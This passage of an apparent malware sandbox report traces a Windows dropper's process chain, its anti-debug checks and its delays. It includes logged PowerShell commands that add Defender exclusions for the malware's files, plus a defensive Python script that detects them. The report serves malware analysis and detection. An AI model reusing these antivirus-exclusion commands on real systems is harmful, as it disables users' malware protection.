Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo, 0_2_0101E6A3
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 600000
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599875
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599766
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599641
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599516
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599406
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 100000
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99874
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99765
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99656
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99546
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99437
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99327
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99218
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99109
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 99000
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98890
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98781
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98672
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98562
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98453
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98343
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98234
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98125
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 98015
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597282
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597125
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 596926
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594834
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594672
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 30000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599705
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568250
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local
Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll >
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe API call chain: ExitProcess graph end node
Source: C:\portintosvc\driverInto.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0101F838
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h] 0_2_01027DEE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102C030 GetProcessHeap, 0_2_0102C030
Source: C:\portintosvc\driverInto.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F9D5 SetUnhandledExceptionFilter, 0_2_0101F9D5
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0101F838
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0101FBCA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01028EBD
Source: C:\portintosvc\driverInto.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe" Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
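The six Add-MpPreference invocations above and the cmd.exe / chcp / ping / payload chain that follows them are what a process-creation feed (Sysmon event 1 or Security event 4688 with command-line logging) shows a defender. The script below is an added example written for this page, not sandbox output and not code from the sample or from Joe Sandbox: it normalizes the paths, resolves the legacy profile junctions (the report itself shows the command line 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' starting the image C:\Users\Default\Pictures\XXPWErhsUbDrk.exe), decodes a -EncodedCommand form of the same cmdlet (constructed here because the Sigma hit in the overview names the encoded variant while the page shows only the plain one), and flags any exclusion or launch that points at a system-process name outside its home directory, at a directory user software should not run from, or at an invented top-level directory such as C:\portintosvc. The directory tables, the junction map and the log records are assumptions of this example, transcribed from the chain on this page rather than produced by any tool.

```python
import base64
import ntpath
import re
from collections import namedtuple

# Heuristic tables are assumptions of this example, modelled on the report's signatures.
# Dropped files reuse system-process names; these are the directories the real binaries live in.
SYSTEM_PROCESS_HOMES = {
    "csrss.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "services.exe": {r"c:\windows\system32"},
    "lsass.exe": {r"c:\windows\system32"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
STANDARD_ROOT_DIRS = {"windows", "program files", "program files (x86)", "users", "programdata"}
SUSPICIOUS_DIRS = ("c:\\users\\default\\", "c:\\windows\\registration\\")
# Legacy profile junctions: the report shows "C:\Users\Default User\My Documents\My Pictures\X.exe"
# being created as "C:\Users\Default\Pictures\X.exe", so exclusions are compared in resolved form.
JUNCTIONS = [
    (re.compile(r"^c:\\users\\default user(?=\\)"), "c:\\users\\default"),
    (re.compile(r"\\my documents\\my pictures(?=\\)"), "\\pictures"),
    (re.compile(r"\\my documents(?=\\)"), "\\documents"),
]
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+(.+)", re.I)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
PING_TARGET_RE = re.compile(r"\bping(?:\.exe)?\b.*(?:localhost|127\.0\.0\.1)(?!\S)", re.I)
PING_COUNT_RE = re.compile(r"-n\s+(\d+)", re.I)
Finding = namedtuple("Finding", "rule image detail")

def normalize(path):
    """Lower-case, fix slashes, strip quotes and resolve the legacy junctions."""
    p = path.strip().strip("'\"").replace("/", "\\").lower()
    for pattern, repl in JUNCTIONS:
        p = pattern.sub(lambda _m, r=repl: r, p)
    return p

def expand_encoded(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) so the cmdlet becomes visible."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def defender_exclusions(cmdline):
    """Normalized paths that an Add-MpPreference -ExclusionPath call would exclude."""
    m = EXCLUSION_RE.search(expand_encoded(cmdline))
    if not m:
        return []
    arg = m.group(1)
    quoted = [a or b for a, b in re.findall(r"'([^']*)'|\"([^\"]*)\"", arg)]
    return [normalize(p) for p in (quoted or arg.split()[:1]) if p]

def misplaced_system_name(path):
    homes = SYSTEM_PROCESS_HOMES.get(ntpath.basename(path))
    return homes is not None and ntpath.dirname(path) not in homes

def suspicious_path_reasons(path):
    reasons = []
    if misplaced_system_name(path):
        reasons.append("system process name outside its home directory")
    if path.startswith(SUSPICIOUS_DIRS):
        reasons.append("directory user software should not run from")
    parts = path.split("\\")  # ["c:", "<top-level dir>", ...]
    if len(parts) > 2 and parts[1] not in STANDARD_ROOT_DIRS:
        reasons.append("non-standard top-level directory")
    return reasons

def ping_sleep_seconds(cmdline):
    """Approximate delay of a 'ping -n N localhost' sleep, or None if not a loopback ping."""
    if not PING_TARGET_RE.search(cmdline):
        return None
    m = PING_COUNT_RE.search(cmdline)
    count = int(m.group(1)) if m else 4  # Windows ping sends 4 requests by default
    return max(count - 1, 0)  # about one second between consecutive requests

def analyze(events):
    """events: iterable of (parent_image, image, command_line) process-creation records."""
    findings = []
    for parent, image, cmdline in events:
        img, par = normalize(image), normalize(parent)
        for excl in defender_exclusions(cmdline):
            why = "; ".join(suspicious_path_reasons(excl)) or "review"
            findings.append(Finding("defender_exclusion_added", img, f"{excl}: {why}"))
        secs = ping_sleep_seconds(cmdline)
        if secs is not None and ntpath.basename(par) == "cmd.exe":
            findings.append(Finding("ping_sleep", img, f"~{secs}s delay: {cmdline.strip()}"))
        if suspicious_path_reasons(img):
            findings.append(Finding("execution_from_suspicious_location", img, f"parent {par}"))
    return findings

# Constructed process-creation records transcribed from the chain in this report; the
# final base64 record is made up here to exercise expand_encoded().
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DRV = r"C:\portintosvc\driverInto.exe"
CMD = r"C:\Windows\System32\cmd.exe"

def _mp(path):
    return f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{path}'"

EVENTS = [
    (r"C:\Users\user\Desktop\Vqzx4PFehn.exe", r"C:\Windows\SysWOW64\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"'),
    (r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "'),
    (r"C:\Windows\SysWOW64\cmd.exe", DRV, r'"C:\portintosvc/driverInto.exe"'),
    (DRV, PS, _mp(r"C:\Recovery\XXPWErhsUbDrk.exe")),
    (DRV, PS, _mp(r"C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe")),
    (DRV, PS, _mp(r"C:\Program Files (x86)\windows defender\services.exe")),
    (DRV, PS, _mp(r"C:\Windows\Registration\csrss.exe")),
    (DRV, CMD, r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"'),
    (CMD, r"C:\Windows\System32\chcp.com", "chcp 65001"),
    (CMD, r"C:\Windows\System32\PING.EXE", "ping -n 10 localhost"),
    (CMD, r"C:\Users\Default\Pictures\XXPWErhsUbDrk.exe",
     r'"C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"'),
    (DRV, PS, "powershell -EncodedCommand " + base64.b64encode(_mp(DRV).encode("utf-16-le")).decode()),
]

if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

Windows ping waits about a second between echo requests, so `ping -n 10 localhost` burns roughly nine seconds before the payload starts; that batch-file delay is the "Uses ping.exe to sleep" signature from the overview. On a live host, compare the paths in this report with `(Get-MpPreference).ExclusionPath` and with the Microsoft-Windows-Windows Defender/Operational log, which records each configuration change as event 5007. Add-MpPreference only succeeds with an elevated token, so an exclusion that actually landed also tells you the dropper ran with administrative rights.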
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01010723 cpuid 0_2_01010723
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0101AF0F
Source: C:\portintosvc\driverInto.exe Queries volume information: C:\portintosvc\driverInto.exe VolumeInformation Jump to behavior
Source: C:\portintosvc\driverInto.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
